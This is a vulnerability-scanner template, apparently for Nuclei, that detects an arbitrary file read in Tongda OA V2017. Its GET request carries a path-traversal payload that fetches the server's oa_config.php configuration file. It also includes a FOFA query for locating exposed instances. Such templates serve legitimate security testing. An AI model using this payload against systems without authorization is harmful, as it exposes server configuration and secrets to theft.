31 lines
876 B
YAML
31 lines
876 B
YAML
|
id: tongda-video-file-read
|
||
|
|
||
|
info:
|
||
|
name: Tongda OA V2017 Video File - Arbitrary File Read
|
||
|
author: SleepingBag945
|
||
|
severity: medium
|
||
|
description: |
|
||
|
There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability.
|
||
|
reference:
|
||
|
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
fofa-query: icon_hash="1967132225"
|
||
|
verified: true
|
||
|
tags: tongda,lfi
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "$ROOT_PATH"
|
||
|
- "$ATTACH_PATH"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|